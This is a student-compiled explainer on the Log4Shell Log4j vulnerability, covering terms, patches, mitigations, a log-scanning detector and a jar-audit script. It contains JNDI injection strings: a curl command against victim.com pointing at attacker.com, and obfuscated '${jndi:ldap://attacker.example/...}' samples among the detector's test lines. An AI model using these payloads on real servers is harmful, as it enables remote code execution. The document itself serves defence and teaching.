ApacheLog4J Vulnerability and Remediation

(Source:Govcert.ch)
  • Understanding Apache Log4J:
  • Java: a programming language; it is an object-oriented, high-level language used for developing various apps, games, etc.
  • API (Application Programming Interface): it works as an agent for communication and services between two clients.
  • JNDI (Java Naming and Directory Interface): it is an API which is used to get names from servers in Java-based applications.
  • LOG4J: it is a Java library which is used for logging purposes, meaning recording everything. It is the oldest and very popular.
  • LDAP (Lightweight Directory Access Protocol): it is used to locate things whose exact location is not known.
  • RCE (Remote Code Execution): it is the ability to run code remotely on a compromised machine.
    -Akashdeep (student, ads150213@gmail.com)

Log4j records all types of events (errors, routine system operations) and communicates diagnostic messages about them to administrators and users. A common example of Log4j is at work when we type or click a bad website or link: it redirects us to a 404 error message, and the web server running the domain of the link tells you that there is no such website. It records that event in a log for the server's system administrators using Log4j.

-Sourav (student,sourav200802@gmail.com)

For example, a web application (the target of this vulnerability) typically stores the user agent string,
which identifies the browser used by visitors.

// Servlet snippet as given on the page; the header call is corrected to HttpServletRequest.getHeader().
// The attacker-controlled header value is passed to Log4j unchanged, which is where the lookup is evaluated.
String userAgent = request.getHeader("User-Agent");
log.info(userAgent);

Attackers can specify a custom user-agent string for their connections.
This data is saved in a log file, and Log4j is exploited while processing it.

Here is a specially crafted user-agent string that triggers this vulnerability:
curl http://victim.com/ -A "${ jndi:ldap://attacker.com/reference}"

-Sourav Singh (student,souravsingh0500@gmail.com)
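Since the exploit string travels inside a logged request header, the defender's first check is whether such strings already appear in the web server's access logs. The following Python detector is an added example (not code from the page or from the Log4j project); it runs over constructed sample log lines, normalises the nested `${lower:…}` and `${…:-x}` lookup forms that split the word "jndi", and then flags the `${jndi:<scheme>:…}` pattern the page describes. The normalisation step goes beyond the literal string on the page so that the same signature still matches obfuscated variants.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not taken from the page). The last
# quoted field on each line is the logged User-Agent string.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/reference}"',
    '198.51.100.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '198.51.100.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${j${::-n}di:rmi://attacker.example/a}"',
]

# Two Log4j lookup forms that evaluate to a plain literal and can be used to
# split the word "jndi" so that a naive substring match misses it:
#   ${lower:X} / ${upper:X}   -> X, case-folded
#   ${name:-X}                -> X when "name" is undefined (default-value form)
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# After normalisation, a lookup of the form ${jndi:<scheme>:...} is what we flag.
_JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|nds|corba|http)\s*:", re.IGNORECASE
)


def _fold_case(m: "re.Match") -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize_lookups(text: str) -> str:
    """Collapse nested case/default lookups, innermost first, until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(_fold_case, text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookup(line: str) -> Optional[str]:
    """Return the JNDI scheme (e.g. 'ldap') if the line carries a lookup, else None."""
    match = _JNDI_LOOKUP.search(normalize_lookups(line))
    return match.group(1).lower() if match else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, scheme) for every line that contains a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        scheme = find_jndi_lookup(line)
        if scheme:
            hits.append((index, scheme))
    return hits


if __name__ == "__main__":
    for index, scheme in scan(SAMPLE_LOG_LINES):
        print(f"line {index}: JNDI lookup via {scheme}")
```

A hit in the access log only shows that an attempt reached the server; whether it succeeded depends on the Log4j version behind it, so each hit should be paired with the version inventory from the later sections. Because the raw request line is what gets logged, the same function can be pointed at proxy or WAF logs without change.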

The Log4j API has 4 main interfaces:

  • LogBuilder: to construct log events before logging them.
  • Logger: the main interface of the log4j package.
      ◦ The class org.apache.logging.log4j.simple.SimpleLogger implements this interface.
  • Marker: adds filterable information to log messages. Markers are hierarchical; for example, an "Error" marker can have children "SystemError" and "ApplicationError".
  • ThreadContext.ContextStack: the ThreadContext stack interface.

FINDING APACHE LOG4J ON A MACHINE:

Step 1: Run the commands below
  • dir C: /s /b | findstr log4j >> Clog4j.txt
  • dir D: /s /b | findstr log4j >> Dlog4j.txt
  • dir E: /s /b | findstr log4j >> Elog4j.txt
  • dir F: /s /b | findstr log4j >> Flog4j.txt

Step 2: Then combine all the files with a single command
  • type Clog4j.txt Dlog4j.txt Elog4j.txt Flog4j.txt > FullLog4j%COMPUTERNAME%.txt

Step 3: This will give a list of log4j files on the different drives, which can be analyzed further to see which jars need to be upgraded.
-Shashank Zaveri (student,zaverishashank0@gmail.com)

For containers running Kubernetes:

Administrators can use "kubectl set env" to specify the LOG4J_FORMAT_MSG_NO_LOOKUPS="true" environment setting, which will automatically reflect on all pods and containers, to deploy the mitigation across Kubernetes clusters where Java applications are utilising Log4j 2.10 to 2.14.1.

For versions 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

-Srikanth Kondra (student,Srikanth@kensleycollege.ca)
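The Windows directory listing in the "FINDING APACHE LOG4J" steps produces a file list; the step after that is deciding, per jar, which of the mitigations described above applies. The following Python audit is an added example (not code from the page, from the students, or from the Log4j project): it walks a directory tree for log4j-core jars, reads the version from each jar's MANIFEST.MF, checks whether JndiLookup.class is still inside, and maps the result onto the version ranges the page gives (class removal for 2.0-beta9 to 2.10.0, the no-lookups flag for 2.10 to 2.14.1, and an upgrade to 2.17.1 for the intermediate fixed releases). The sample jars it audits are constructed in a temporary directory and contain only a manifest and an empty class entry.

```python
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:beta|rc)(\d+))?$", re.IGNORECASE)

# Recommendation strings returned by recommend(); ranges follow the page's text.
OK = "ok"
UPGRADE = "upgrade to 2.17.1"
ENV_OR_REMOVE = "set LOG4J_FORMAT_MSG_NO_LOOKUPS=true or remove JndiLookup.class, then upgrade to 2.17.1"
REMOVE_CLASS = "remove JndiLookup.class, then upgrade to 2.17.1"
ALREADY_MITIGATED = "JndiLookup.class already removed; still upgrade to 2.17.1"


def version_key(version: str):
    """Sortable tuple; pre-releases such as 2.0-beta9 sort before the final 2.0."""
    m = _VERSION.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 1 if pre is None else 0, int(pre or 0))


def jar_version(jar_path: str) -> Optional[str]:
    """Implementation-Version from the jar's MANIFEST.MF, or None if absent."""
    with zipfile.ZipFile(jar_path) as zf:
        if "META-INF/MANIFEST.MF" not in zf.namelist():
            return None
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def has_jndi_lookup(jar_path: str) -> bool:
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_CLASS in zf.namelist()


def recommend(version: str, jndi_present: bool) -> str:
    v = version_key(version)
    if v >= version_key("2.17.1"):
        return OK
    if v >= version_key("2.15.0"):
        return UPGRADE            # 2.15, 2.16 and 2.17 each had a follow-on CVE
    if not jndi_present:
        return ALREADY_MITIGATED
    if v >= version_key("2.10.0"):
        return ENV_OR_REMOVE      # 2.10 to 2.14.1 honour the no-lookups flag
    return REMOVE_CLASS           # 2.0-beta9 to 2.10.0: the flag is not available


def find_log4j_core_jars(root: str) -> List[str]:
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            lowered = name.lower()
            if lowered.startswith("log4j-core") and lowered.endswith(".jar"):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def audit(root: str) -> Dict[str, str]:
    """Map each log4j-core jar (path relative to root) to a recommendation."""
    report = {}
    for jar in find_log4j_core_jars(root):
        version = jar_version(jar)
        key = os.path.relpath(jar, root).replace(os.sep, "/")
        report[key] = ("unknown version; inspect manually" if version is None
                       else recommend(version, has_jndi_lookup(jar)))
    return report


def make_sample_jar(directory: str, version: str, include_jndi: bool = True) -> str:
    """Constructed stand-in jar: a manifest plus, optionally, an empty JndiLookup.class entry."""
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"")
    return path


def demo() -> Dict[str, str]:
    """Build a throwaway tree of sample jars covering each version range and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        make_sample_jar(os.path.join(tmp, "app1", "lib"), "2.0-beta9")
        make_sample_jar(os.path.join(tmp, "app2", "lib"), "2.14.1")
        make_sample_jar(os.path.join(tmp, "app3", "lib"), "2.14.1", include_jndi=False)
        make_sample_jar(os.path.join(tmp, "app4", "lib"), "2.16.0")
        make_sample_jar(os.path.join(tmp, "app5", "lib"), "2.17.1")
        return audit(tmp)


if __name__ == "__main__":
    for jar, action in demo().items():
        print(f"{jar}: {action}")
```

Point `audit()` at the directories that the Windows listing turned up (or at `/` on a Linux host) to get the same per-jar decision on real files; the version string comes from the jar itself rather than the file name, so renamed or bundled copies are still classified. Jars nested inside WAR or EAR archives are not opened by this example and need a second pass.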

For Discovery:

Run Nmap with the --script log4shell.nse script:
nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p <port>]

-Manveer Kaur (student, kaur.manvir121998@gmail.com)

Many organizations such as Qualys, Nessus, Datto and Cloudflare, which provide cybersecurity and vulnerability management services, indicated that they have added plugins and controls relating to this major vulnerability.

-Monika (student, monikathind36@gmail.com)

Apache released a fix for CVE-2021-44228, version 2.15. However, this patch left a portion of the vulnerability unpatched, leading to CVE-2021-45046 and the release of a second patch, version 2.16.

Apache released a third patch, version 2.17, to address a related vulnerability, CVE-2021-45105. They released a fourth patch, 2.17.1, to address another vulnerability, CVE-2021-44832.

-Adhish Sethi (student,aadish09sethi@gmail.com)

Attackers can take advantage of it by modifying their browser's user-agent string to the ${jndi:ldap://[attacker_URL]} format.

-Simranjeet Kaur (student, simranjeetkaurs1994@gmail.com)

Reference:

-Akter

Log4j versions 2.0 to 2.14.1 are still affected.
-Rishi

Cyber Security Hygiene remediation steps including Log4J:

  1. Follow cyber security best practices: Double check your best practices, especially for any systems or devices directly connected to the internet. Those connections represent the greatest risk beyond your secure perimeter, so minimize the internet exposure of your systems and assets.
  2. Know the products and tools your business uses: If you don’t have an IT expert on staff, check with your product vendors to see how they’re addressing potential vulnerabilities in their tools and products. Find out how they’re responding to this threat and what patching or mitigations might be required.
  3. Check in with your service providers: Your business is only as secure as your supply chain, so find out how your providers are responding. If fraudsters can infiltrate your service provider’s systems, they might also be able to penetrate your systems.
  4. Be vigilant in watching for the warning signs: Tools for threat prevention, detection and response are more critical than ever. You must be able to properly monitor all your systems and quickly identify threats from any mechanism, including zero-day threats like Log4j. It's also important to respond to an attack in real time.
  5. Keep your team informed: When a new vulnerability arises, it’s a great reminder to be proactive with your employees—make them aware of the threat and explain how they can help provide the first line of defense for your business.

-Suhani
